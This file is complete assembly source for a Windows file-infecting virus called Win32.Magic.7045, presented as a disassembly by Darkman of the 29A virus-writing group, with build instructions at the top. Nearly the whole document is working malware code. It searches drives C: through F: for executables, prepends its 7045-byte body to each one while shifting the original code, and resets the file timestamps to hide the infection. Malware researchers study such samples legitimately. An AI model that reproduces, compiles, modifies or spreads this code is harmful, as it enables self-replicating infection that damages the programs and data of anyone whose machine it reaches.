comment *
                            Win32.Magic.7045          ÜÛÛÛÛÛÜ ÜÛÛÛÛÛÜ ÜÛÛÛÛÛÜ
                             Disassembly by           ÛÛÛ ÛÛÛ ÛÛÛ ÛÛÛ ÛÛÛ ÛÛÛ
                              Darkman/29A              ÜÜÜÛÛß ßÛÛÛÛÛÛ ÛÛÛÛÛÛÛ
                                                      ÛÛÛÜÜÜÜ ÜÜÜÜÛÛÛ ÛÛÛ ÛÛÛ
                                                      ÛÛÛÛÛÛÛ ÛÛÛÛÛÛß ÛÛÛ ÛÛÛ

  Win32.Magic.7045 is a 7045 bytes runtime/direct action EXE virus. Infects
  all files in all directories at drive C:, D:, E: and F:, when executed, by
  every file in current directory and Windows directory, when executed, by
  prepending the virus to the original EXE file.

  Compile Win32.Magic.7045 with Turbo Assembler v 5.0 by typing:
    TASM32 /M /ML /Q /ZD VOODOO.ASM
    TLINK32 -Tpe -c -x -aa -r -v VOODOO.OBJ,,, IMPORT32
*

.386
.model flat
; KERNEL32.dll
        extrn   CopyFileA:proc
        extrn   CloseHandle:proc
        extrn   CreateFileMappingA:proc
        extrn   CreateProcessA:proc
        extrn   DeleteFileA:proc
        extrn   CreateFileA:proc
        extrn   FindFirstFileA:proc
        extrn   FindNextFileA:proc
        extrn   FlushViewOfFile:proc
        extrn   GetCommandLineA:proc
        extrn   GetCurrentDirectoryA:proc
        extrn   GetExitCodeProcess:proc
        extrn   GetFileSize:proc
        extrn   ExitProcess:proc
        extrn   GetProcAddress:proc
        extrn   GetStartupInfoA:proc
        extrn   GlobalAlloc:proc
        extrn   GlobalFree:proc
        extrn   GlobalLock:proc
        extrn   GlobalUnlock:proc
        extrn   MapViewOfFile:proc
        extrn   ReadFile:proc
        extrn   SetCurrentDirectoryA:proc
        extrn   SetFileAttributesA:proc
        extrn   SetFileTime:proc
        extrn   Sleep:proc
        extrn   UnmapViewOfFile:proc
        extrn   lstrcpyA:proc
        extrn   GetModuleHandleA:proc
; USER32.dll
        extrn   MessageBoxA:proc

.data
VirusSize               equ     1b85h   ; Size of virus (7045 bytes)
nBufferLength           equ     320h    ; Size, in characters, of directory
                                        ; buffer
MAX_PATH                equ     104h

FALSE                   equ     00h
TRUE                    equ     01h
FILE_ATTRIBUTE_DIRECTORY        equ     10h
                                        ; The "file or directory" is a
                                        ; directory
FILE_ATTRIBUTE_ARCHIVE  equ     20h     ; The file is an archive file.
                                        ; Applications use this attribute to
                                        ; mark files for backup or removal.
CREATE_NEW              equ     01h     ; Creates a new file. The function
                                        ; fails if the specified file already
                                        ; exists.
OPEN_EXISTING           equ     03h     ; Opens the file. The function fails
                                        ; if the file does not exist.
FILE_SHARE_READ         equ     01h     ; Other open operations can be
                                        ; performed on the file for read
                                        ; access. If the CreateFile function
                                        ; is opening the client end of a
                                        ; mailslot, this flag is specified.
FILE_SHARE_WRITE        equ     02h     ; Other open operations can be
                                        ; performed on the file for write
                                        ; access.
GENERIC_WRITE           equ     40000000h
                                        ; Specifies write access to the file.
                                        ; Data can be written to the file and
                                        ; the file pointer can be moved.
GENERIC_READ            equ     80000000h
                                        ; Specifies read access to the file.
                                        ; Data can be read from the file and
                                        ; the file pointer can be moved.
PAGE_READWRITE          equ     04h     ; Gives read-write access to the
                                        ; committed region of pages
FILE_MAP_WRITE          equ     02h     ; Read-write access

NORMAL_PRIORITY_CLASS   equ     20h     ; Indicates a normal process with no
                                        ; special scheduling needs.
INVALID_HANDLE_VALUE    equ     -01h

STARTUPINFO struct
  cb                    DWORD   ?       ; Specifies the size, in bytes, of the
                                        ; structure.
  lpReserved            DWORD   ?       ; Reserved. Set this member to NULL
                                        ; before passing the structure to
                                        ; CreateProcess
  lpDesktop             DWORD   ?       ; Points to a zero-terminated string
                                        ; that specifies either the name of
                                        ; the desktop only or the name of both
                                        ; the window station and desktop for
                                        ; this process
  lpTitle               DWORD   ?       ; For console processes, this is the
                                        ; title displayed in the title bar if
                                        ; a new console window is created
  dwX                   DWORD   ?       ; Specifies the x offset, in pixels,
                                        ; of the upper left corner of a window
                                        ; if a new window is created. The
                                        ; offset is from the upper left corner
                                        ; of the screen
  dwY                   DWORD   ?       ; Specifies the y offset, in pixels,
                                        ; of the upper left corner of a window
                                        ; if a new window is created. The
                                        ; offset is from the upper left corner
                                        ; of the screen
  dwXSize               DWORD   ?       ; Specifies the width, in pixels, of
                                        ; the window if a new window is
                                        ; created
  dwYSize               DWORD   ?       ; Specifies the height, in pixels, of
                                        ; the window if a new window is
                                        ; created
  dwXCountChars         DWORD   ?       ; Specifies the screen buffer width in
                                        ; character columns
  dwYCountChars         DWORD   ?       ; Specifies the screen buffer height
                                        ; in character rows
  dwFillAttribute       DWORD   ?       ; Specifies the initial text and
                                        ; background colors if a new console
                                        ; window is created
  dwFlags               DWORD   ?       ; This is a bit field that determines
                                        ; whether certain STARTUPINFO members
                                        ; are used when the process creates a
                                        ; window
  wShowWindow           WORD    ?       ; Specifies the default value the first
                                        ; time
  cbReserved2           WORD    ?       ; Reserved; must be zero
  lpReserved2           DWORD   ?       ; Reserved; must be NULL
  hStdInput             DWORD   ?       ; Specifies a handle that will be used
                                        ; as the standard input handle of the
                                        ; process
  hStdOutput            DWORD   ?       ; Specifies a handle that will be used
                                        ; as the standard output handle of the
                                        ; process
  hStdError             DWORD   ?       ; Specifies a handle that will be used
                                        ; as the standard error handle of the
                                        ; process
ends

FILETIME struct
  dwLowDateTime         DWORD   ?       ; Specifies the low-order 32 bits of
                                        ; the file time
  dwHighDateTime        DWORD   ?       ; Specifies the high-order 32 bits of
                                        ; the file time
ends

WIN32_FIND_DATA struct
  dwFileAttributes      DWORD   ?       ; Specifies the file attributes of the
                                        ; file found
  ftCreationTime        FILETIME <>     ; Specifies the time the file was
                                        ; created
  ftLastAccessTime      FILETIME <>     ; Specifies the time that the file was
                                        ; last accessed
  ftLastWriteTime       FILETIME <>     ; Specifies the time that the file was
                                        ; last written to
  nFileSizeHigh         DWORD   ?       ; Specifies the high-order DWORD value
                                        ; of the file size, in bytes
  nFileSizeLow          DWORD   ?       ; Specifies the low-order DWORD value
                                        ; of the file size, in bytes
  dwReserved0           DWORD   ?       ; Reserved for future use
  dwReserved1           DWORD   ?       ; Reserved for future use
  cFileName             BYTE MAX_PATH dup(?)
                                        ; A null-terminated string that is the
                                        ; name of the file
  cAlternate            BYTE 0eh dup(?) ; A null-terminated string that is an
                                        ; alternative name for the file
ends

PROCESS_INFORMATION struct
  hProcess              DWORD      ?    ; Handle to the newly created process
  hThread               DWORD      ?    ; Handle to the primary thread of the
                                        ; newly created process
  dwProcessId           DWORD      ?    ; Global process identifier that can
                                        ; be used to identify a process
  dwThreadId            DWORD      ?    ; global thread identifiers that can
                                        ; be used to identify a thread
ends

szFileName      db      '*.EXE',00h     ; Name of file to search for
szFileName_     db      '*.*',00h       ;  "   "   "   "    "     "
szCurDir        db      'c:\',00h       ; Name of new current directory
                db      'Magic People-Voodoo People !',00h
                db      00h
ProcessInformation      PROCESS_INFORMATION <>
dwExitCode      dd      ?               ; Termination status
dwFileHandle    dd      ?               ; File handle
dwFileHandle_   dd      ?               ; File handle
dwMappingHandle dd      ?               ; File mapping handle
lpMappedView    dd      ?               ; Starting address of the mapped view
dwFileSize      dd      ?               ; Low-order doubleword of the file
                                        ; size
infect_flag     db      ?               ; Infection flag
exit_flag       db      ?               ; Exit flag
NumberOfBytesRead       dd      ?       ; Number of bytes read
lpFileExtension dd      ?               ; Pointer to file extension
StartupInfo     STARTUPINFO <>
szFileName__:
                db      11ah dup(00h)
                db      206h dup(?)
FindFileData    WIN32_FIND_DATA <>
                db      20eh dup(?)
cBuffer         db      VirusSize dup(?)
                                        ; Buffer that receives data
dwSearchHandle  dd      ?               ; Search handle
dwSearchHandle_ dd      ?               ; Search handle
szCurDir_:
cBuffer_        db      320h dup(?)     ; Buffer for current directory
szCurDir__:
cBuffer__       db      320h dup(?)     ; Buffer for current directory
                db      724h dup(?)
                
.code
code_begin:
        push    offset StartupInfo      ; Address of STARTUPINFO structure
        call    GetStartupInfoA

        call    GetCommandLineA
        mov     esi,eax                 ; ESI = pointer to the command-line
                                        ; string for the current process
        cmp     byte ptr [esi+01h],':'  ; Not Universal Naming Convention
                                        ; (UNC)?
        je      _lstrcpyA               ; Equal? Jump to _lstrcpyA

        inc     eax                     ; Increase pointer to the command-line
                                        ; string for the current process
_lstrcpyA:
        push    eax                     ; EAX = address of string to copy
        push    offset szFileName__     ; Address of buffer
        call    lstrcpyA

        lea     esi,szFileName__        ; ESI = offset of szFileName__
find_dot_in_filename:
        inc     esi                     ; Increase pointer to the command-line
                                        ; string for the current process

        cmp     byte ptr [esi],'.'      ; Found  dot in filename?
        jne     find_dot_in_filename    ; Not equal? Jump to 
                                        ; find_dot_in_filename
        mov     byte ptr [esi+04h],00   ; Store zero at end of filename
        mov     [lpFileExtension],esi   ; Store pointer to file extension

        push    00h                     ; Handle of file with attributes to
                                        ; copy
        push    FILE_ATTRIBUTE_ARCHIVE  ; File attributes
        push    OPEN_EXISTING           ; How to create 
        push    00h                     ; Address of security descriptor
        push    FILE_SHARE_READ         ; Share mode
        push    GENERIC_READ            ; Access (read-write) mode
        push    offset szFileName__     ; Address of name of the file
        call    CreateFileA
        mov     [dwFileHandle],eax      ; Store file handle

        push    eax                     ; EAX = file handle
        push    00h                     ; Address of structure for data
        push    offset NumberOfBytesRead
                                        ; Address of number of bytes read
        push    VirusSize               ; Number of bytes to read
        push    offset cBuffer          ; Address of buffer that receives data
        push    eax                     ; Handle of file to read 
        call    ReadFile
        pop     eax                     ; EAX = file handle

        push    00h                     ; Address of high-order word for file
                                        ; size
        push    eax                     ; Handle of file to get size of
        call    GetFileSize
        mov     [dwFileSize],eax        ; Store low-order doubleword of the
                                        ; file size
        cmp     eax,VirusSize           ; First generation?
        je      virus_exit              ; Equal? Jump to virus_exit

        mov     esi,[lpFileExtension]   ; ESI = pointer to file extension
        mov     [esi],'MOC.'            ; Store file extension
        cmp     [esi+05h],'$$$$'        ; Temporarily disnfected file?
        je      _DeleteFileA            ; Equal? Jump to _DeleteFileA

        push    00h                     ; Handle of file with attributes to
                                        ; copy
        push    FILE_ATTRIBUTE_ARCHIVE  ; File attributes
        push    CREATE_NEW + OPEN_EXISTING
                                        ; How to create 
        push    00h                     ; Address of security descriptor
        push    FILE_SHARE_READ + FILE_SHARE_WRITE
                                        ; Share mode
        push    GENERIC_READ + GENERIC_WRITE
                                        ; Access (read-write) mode
        push    offset szFileName__     ; Address of name of the file
        call    CreateFileA
        mov     [dwFileHandle_],eax     ; Store file handle

        push    00h                     ; Name of file-mapping object
        push    [dwFileSize]            ; Low-order doubleword of object size
        push    00h                     ; High-order doubleword of object size
        push    PAGE_READWRITE          ; Protection for mapping object
        push    00h                     ; Optional security attributes
        push    [dwFileHandle_]         ; Handle of file to map
        call    CreateFileMappingA
        mov     [dwMappingHandle],eax   ; Store file mapping handle

        push    [dwFileSize]            ; Low-order doubleword of object size
        push    00h                     ; Low-order doubleword of file offset
        push    00h                     ; High-order doubleword of file offset
        push    FILE_MAP_WRITE          ; Access mode
        push    eax                     ; File-mapping object to map into
                                        ; address space
        call    MapViewOfFile
        mov     [lpMappedView],eax      ; Store starting address of the mapped
                                        ; view

        push    00h                     ; Address of structure for data
        push    offset NumberOfBytesRead
                                        ; Address of number of bytes read
        push    [dwFileSize]            ; Low-order doubleword of object size
        push    eax                     ; Address of buffer that receives data
        push    [dwFileHandle]          ; Handle of file to read
        call    ReadFile

        push    00h                     ; Number of bytes in range 
        push    [lpMappedView]          ; Starting address of the mapped view
        call    FlushViewOfFile

        push    [lpMappedView]          ; Address where mapped view begins
        call    UnmapViewOfFile

        push    [dwMappingHandle]       ; Handle of object to close
        call    CloseHandle

        push    [dwFileHandle_]         ; Handle of object to close
        call    CloseHandle

        push    offset ProcessInformation
                                        ; Pointer to PROCESS_INFORMATION
        push    offset StartupInfo      ; Pointer to STARTUPINFO
        push    00h                     ; Pointer to current directory name
        push    00h                     ; Pointer to new environment block
        push    NORMAL_PRIORITY_CLASS   ; Creation flags
        push    00h                     ; Handle inheritance flag
        push    00h                     ; Pointer to thread security
                                        ; attributes
        push    00h                     ; Pointer to process security
                                        ; attributes

        mov     esi,[lpFileExtension]   ; ESI = pointer to file extension
        mov     byte ptr [esi+04h],' '  ; Store space at end of filename

        push    offset szFileName__     ; Pointer to command line string
        push    00h                     ; Pointer to name of executable module
        call    CreateProcessA

        jmp     _CloseHandle
virus_exit:
        mov     [exit_flag],TRUE        ; Exit code for all threads
_CloseHandle:
        push    [dwFileHandle]          ; Handle of object to close
        call    CloseHandle

        call    infect_drives
        cmp     [exit_flag],TRUE        ; Exit code for all threads?
        je      _ExitProcess            ; Equal? Jump to _ExitProcess
_GetExitCodeProcess:
        push    offset dwExitCode       ; Address to receive termination
                                        ; status
        push    [ProcessInformation.hProcess]
                                        ; Handle to the process
        call    GetExitCodeProcess
        cmp     [dwExitCode],00h        ; No error?
        je      _CreateProcessA         ; Equal? Jump to _CreateProcessA

        jmp     _GetExitCodeProcess
_CreateProcessA:
        push    offset ProcessInformation
                                        ; Pointer to PROCESS_INFORMATION
        push    offset StartupInfo      ; Pointer to STARTUPINFO
        push    00h                     ; Pointer to current directory name
        push    00h                     ; Pointer to new environment block
        push    NORMAL_PRIORITY_CLASS   ; Creation flags
        push    00h                     ; Handle inheritance flag
        push    00h                     ; Pointer to thread security
                                        ; attributes
        push    00h                     ; Pointer to process security
                                        ; attributes

        mov     esi,[lpFileExtension]   ; ESI = pointer to file extension
        mov     byte ptr [esi+04h],' '  ; Store space at end of filename
        mov     [esi],'EXE.'            ; Store file extension
        mov     [esi+05h],'$$$$'        ; Store command-line

        push    offset szFileName__     ; Pointer to command line string
        push    00h                     ; Pointer to name of executable module
        call    CreateProcessA
_ExitProcess:
        push    00h                     ; Exit code for all threads
        call    ExitProcess
_DeleteFileA:
        push    offset szFileName__     ; Address of name of file to delete
        call    DeleteFileA

        jmp     _ExitProcess

infect_drives   proc    near            ; Infect drives
        push    offset cBuffer_         ; Address of buffer for current
                                        ; directory
        push    nBufferLength           ; Size, in characters, of directory
                                        ; buffer
        call    GetCurrentDirectoryA

        call    infect_directories

        mov     ecx,04h                 ; Infect drive C:, D:, E: and F:
set_current_directory_loop:
        push    ecx                     ; ECX = counter
        push    offset szCurDir         ; Address of name of new current
                                        ; directory
        call    SetCurrentDirectoryA

        call    infect_directories

        inc     byte ptr [szCurDir]     ; Increase drive letter

        pop     ecx                     ; ECX = counter
        loop    set_current_directory_loop

        push    offset szCurDir_        ; Address of name of new current
                                        ; directory
        call    SetCurrentDirectoryA

        jmp     _FindNextFileA

        ret                             ; Return
                endp

infect_directories      proc    near    ; Infect directories
        push    offset cBuffer__        ; Address of buffer for current
                                        ; directory
        push    nBufferLength           ; Size, in characters, of directory
                                        ; buffer
        call    GetCurrentDirectoryA

        push    offset FindFileData     ; Address of returned information
        push    offset szFileName_      ; Address of name of file to search
                                        ; for
        call    FindFirstFileA
        mov     [dwSearchHandle],eax    ; Store search handle
_FindNextFileA:
        push    offset FindFileData     ; Address of returned information
        push    [dwSearchHandle]        ; Handle of search
        call    FindNextFileA
        or      eax,eax                 ; Function failed?
        jz      function_failed         ; Zero? Jump to function_failed

        cmp     [FindFileData.cFileName],'.'
                                        ; Directory?
        je      _FindNextFileA          ; Equal? Jump to _FindNextFileA
        mov     eax,[FindFileData.dwFileAttributes]
        and     eax,FILE_ATTRIBUTE_DIRECTORY
                                        ; Directory?
        jz      _FindNextFileA          ; Zero? Jump to _FindNextFileA

        push    offset szCurDir__       ; Address of name of new current
                                        ; directory
        call    SetCurrentDirectoryA

        push    offset FindFileData.cFileName
                                        ; Address of name of new current
                                        ; directory
        call    SetCurrentDirectoryA

        push    offset FindFileData     ; Address of returned information
        push    offset szFileName       ; Address of name of file to search
                                        ; for
        call    FindFirstFileA
        mov     [dwSearchHandle_],eax   ; Store search handle
        cmp     eax,INVALID_HANDLE_VALUE
        je      _FindNextFileA          ; Function failed? Jump to
                                        ; _FindNextFileA
continue_a_file_search:
        or      eax,eax                 ; Function failed?
        jz      _FindNextFileA          ; Zero? Jump to _FindNextFileA

        call    infect_file

        push    offset FindFileData     ; Address of returned information
        push    [dwSearchHandle_]       ; Handle of search
        call    FindNextFileA

        jmp     continue_a_file_search
function_failed:
        ret                             ; Return
                        endp

infect_file     proc    near            ; Infect file
        push    FILE_ATTRIBUTE_ARCHIVE  ; Address of attributes to set
        push    offset FindFileData.cFileName
                                        ; Address of filename
        call    SetFileAttributesA

        push    00h                     ; Handle of file with attributes to
                                        ; copy
        push    FILE_ATTRIBUTE_ARCHIVE  ; File attributes
        push    OPEN_EXISTING           ; How to create 
        push    00h                     ; Address of security descriptor
        push    FILE_SHARE_READ + FILE_SHARE_WRITE
                                        ; Share mode
        push    GENERIC_READ + GENERIC_WRITE
                                        ; Access (read-write) mode
        push    offset FindFileData.cFileName
                                        ; Address of name of the file
        call    CreateFileA
        cmp     eax,INVALID_HANDLE_VALUE
        je      _SetFileAttributesA     ; Function failed? Jump to
                                        ; _SetFileAttributesA
        mov     [dwFileHandle],eax      ; Store file handle

        push    00h                     ; Address of high-order word for file
                                        ; size
        push    eax                     ; Handle of file to get size of
        call    GetFileSize
        mov     [dwFileSize],eax        ; Store low-order doubleword of the
                                        ; file size
_CreateFileMappingA:
        push    eax                     ; EAX = low-order doubleword of the
                                        ; file size

        push    00h                     ; Name of file-mapping object
        push    eax                     ; Low-order doubleword of object size
        push    00h                     ; High-order doubleword of object size
        push    PAGE_READWRITE          ; Protection for mapping object
        push    00h                     ; Optional security attributes
        push    [dwFileHandle]
        call    CreateFileMappingA
        mov     [dwMappingHandle],eax   ; Store file mapping handle

        push    00h                     ; Low-order doubleword of file offset
        push    00h                     ; High-order doubleword of file offset
        push    FILE_MAP_WRITE          ; Access mode
        push    eax                     ; File-mapping object to map into
                                        ; address space
        call    MapViewOfFile

        cmp     [infect_flag],TRUE      ; Infect file?
        je      infect_file_            ; Equal? Jump to infect_file_

        mov     esi,eax                 ; ESI = starting address of the mapped
                                        ; view
        mov     edi,[esi+3ch]           ; EDI = offset of new executable (NE,
                                        ; LE,etc) header within disk file
        cmp     dword ptr [esi+edi],'EP'
                                        ; Portable Executable (PE)?
        jne     infect_exit             ; Not equal? Jump to infect_exit
        cmp     [esi+6fh],'3NIW'
        je      infect_exit             ; Equal? Jump to infect_exit

        call    _UnmapViewOfFile
 
        mov     [infect_flag],TRUE      ; Infect file
 
        mov     eax,[dwFileSize]        ; EAX = Low-order doubleword of the
                                        ; file size
        add     eax,VirusSize           ; Add size of virus to low-order
                                        ; doubleword of the file size
        jmp     _CreateFileMappingA
infect_file_:
        mov     [infect_flag],FALSE     ; Don't infect file
        mov     [lpMappedView],eax      ; Store starting address of the mapped
                                        ; view

        push    edi esi ecx             ; Save registers at stack
        pushf                           ; Save flags at stack
        add     eax,[dwFileSize]        ; Add low-order doubleword of the file
                                        ; size to starting address of the
                                        ; mapped view
        add     eax,VirusSize-01h       ; Add size of virus minus one to
                                        ; starting address of the mapped view
        mov     edi,eax                 ; EDI = pointer to last byte of file
        mov     esi,[lpMappedView]      ; ESI = starting address of the mapped
                                        ; view
        add     esi,[dwFileSize]        ; Add low-order doubleword of the file
                                        ; size to starting address of the
                                        ; mapped view
        mov     ecx,[dwFileSize]        ; ECX = low-order doubleword of the
                                        ; file size
        dec     esi                     ; ESI = pointer to last byte of
                                        ; original code
        std                             ; Set direction flag
        rep     movsb                   ; Move original code to end of file

        mov     edi,[lpMappedView]      ; EDI = starting address of the mapped
                                        ; view
        xor     eax,eax                 ; Zero EAX
        mov     ecx,VirusSize           ; Store seven thousand and forty-five
                                        ; bytes
        cld                             ; Clear direction flag
        rep     stosb                   ; Overwrite the first seven thousand
                                        ; and forty-five bytes of original
                                        ; code

        mov     edi,[lpMappedView]      ; EDI = starting address of the mapped
                                        ; view
        lea     esi,cBuffer             ; ESI = offset of cBuffer
        mov     ecx,VirusSize           ; Move seven thousand and forty-five
                                        ; bytes
        cld                             ; Clear direction flag
        rep     movsb                   ; Move virus to beginning of file
        popf                            ; Load flags from stack
        pop     ecx esi edi             ; Load registers from stack
infect_exit:
        call    _UnmapViewOfFile

        push    offset FindFileData.ftLastWriteTime-08h
                                        ; Time the file was last written
        push    offset FindFileData.ftLastAccessTime-04h
                                        ; Time the file was last accessed 
        push    offset FindFileData.ftCreationTime
                                        ; Time the file was created 
        push    [dwFileHandle]          ; Identifies the file
        call    SetFileTime

        push    [dwFileHandle]          ; Handle of object to close
        call    CloseHandle
_SetFileAttributesA:
        push    [FindFileData.dwFileAttributes]
                                        ; Address of attributes to set
        push    offset FindFileData.cFileName
                                        ; Address of filename
        call    SetFileAttributesA

        ret                             ; Return
                endp

_UnmapViewOfFile        proc    near    ; Unmaps a mapped view of a file from
                                        ; the calling process's address space
                                        ; and close it
        push    [lpMappedView]          ; Address where mapped view begins
        call    UnmapViewOfFile

        push    [dwMappingHandle]       ; Handle of object to close
        call    CloseHandle

        ret                             ; Return
                        endp
code_end:

end          code_begin